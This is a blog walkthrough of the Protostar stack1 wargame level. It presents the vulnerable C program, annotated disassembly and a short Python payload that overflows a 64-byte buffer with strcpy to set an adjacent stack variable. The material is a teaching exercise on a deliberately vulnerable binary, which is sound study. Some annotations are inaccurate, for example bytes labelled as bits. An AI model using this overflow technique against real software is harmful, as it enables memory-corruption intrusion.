Skip to main content

Binary Exploitation Protostar Stack1 - Walkthrough -Writeup

Hello Guyz,




In This Post, I am going to show you how we can win protostar stack1 level and in today's tutorial, our main focus will be on variable overwriting. we are going to learn a simple concept/technique that can overwrite the values of any variable Onto Stack during running state.

Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.


Source Code :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}




Hint Provided By Exploit-Exercise.

This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

This level is at /opt/protostar/bin/stack1

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
Protostar is little endian

Solution:

Simply We Just Need To Overwrite the value of modified variable located Onto the Stack.
Before Start, Let's Try To Understand Situation Onto The Stack


0                        28                                                      92        96
 ============================================================================================
        Other Things     |  Injectable Area                                      | modified | 
 ============================================================================================


Disassembly Of Codes

   0x08048464 <+0>: push   ebp
   0x08048465 <+1>: mov    ebp,esp
   0x08048467 <+3>: and    esp,0xfffffff0
   0x0804846a <+6>: sub    esp,0x60                  << ====== 96 Bits Buffer Created
   0x0804846d <+9>: cmp    DWORD PTR [ebp+0x8],0x1   << ====== Comparing Args Variable with 1
   0x08048471 <+13>: jne    0x8048487 <main+35>   << ====== Jump Condition
   0x08048473 <+15>: mov    DWORD PTR [esp+0x4],0x80485a0 
   0x0804847b <+23>: mov    DWORD PTR [esp],0x1
   0x08048482 <+30>: call   0x8048388 <errx@plt>
   0x08048487 <+35>: mov    DWORD PTR [esp+0x5c],0x0  << ===== Variable Value [modified variable]
   0x0804848f <+43>: mov    eax,DWORD PTR [ebp+0xc]   << ===== BUffer Starting Address To Insert String Through Strcpy
   0x08048492 <+46>: add    eax,0x4                  << ===== Add 4 To EAX
   0x08048495 <+49>: mov    eax,DWORD PTR [eax]      << ===== Loading Data From EAX mapped  
   0x08048497 <+51>: mov    DWORD PTR [esp+0x4],eax  << ===== Storing Current EAX Value Into Stack 
   0x0804849b <+55>: lea    eax,[esp+0x1c]           << ===== Starting POint Address To Insert Data Into Stack Buffer
   0x0804849f <+59>: mov    DWORD PTR [esp],eax        
   0x080484a2 <+62>: call   0x8048368 <strcpy@plt>
   0x080484a7 <+67>: mov    eax,DWORD PTR [esp+0x5c]
   0x080484ab <+71>: cmp    eax,0x61626364
   0x080484b0 <+76>: jne    0x80484c0 <main+92>
   0x080484b2 <+78>: mov    DWORD PTR [esp],0x80485bc
   0x080484b9 <+85>: call   0x8048398 <puts@plt>
   0x080484be <+90>: jmp    0x80484d5 <main+113>
   0x080484c0 <+92>: mov    edx,DWORD PTR [esp+0x5c]
   0x080484c4 <+96>: mov    eax,0x80485f3
   0x080484c9 <+101>: mov    DWORD PTR [esp+0x4],edx
   0x080484cd <+105>: mov    DWORD PTR [esp],eax
   0x080484d0 <+108>: call   0x8048378 <printf@plt>
   0x080484d5 <+113>: leave  
   0x080484d6 <+114>: ret    



Exploit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
#!/usr/bin/python
# -*- coding:utf-8 -*-
import struct

# Usages :  ./bin/stack1 $(cat tmp)

payload = "a"*64
payload+= struct.pack("I", 0x61626364)


print payload



Very Easy! Hahaha.


For More Detailed Walk through Check Below Provided YouTube Video Playlist



Comments

Related Post

Top Visited

Create Simple Packet Sniffer Using Python

how to install burp suite in Linux/Ubuntu 16.04

Big List Of Google Dorks For Sqli Injection

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

How to create Phishing Page Using Kali Linux | Webpage Page Cloning Using Kali Linux Social Engineering Toolkit

Latest Google Dorks List

What is the use of Pseudo header in TCP/UDP packets?

Best 1000 User-agents List For Web Scraping

How To Install GDB Peda?

how to configure burpsuite with firefox?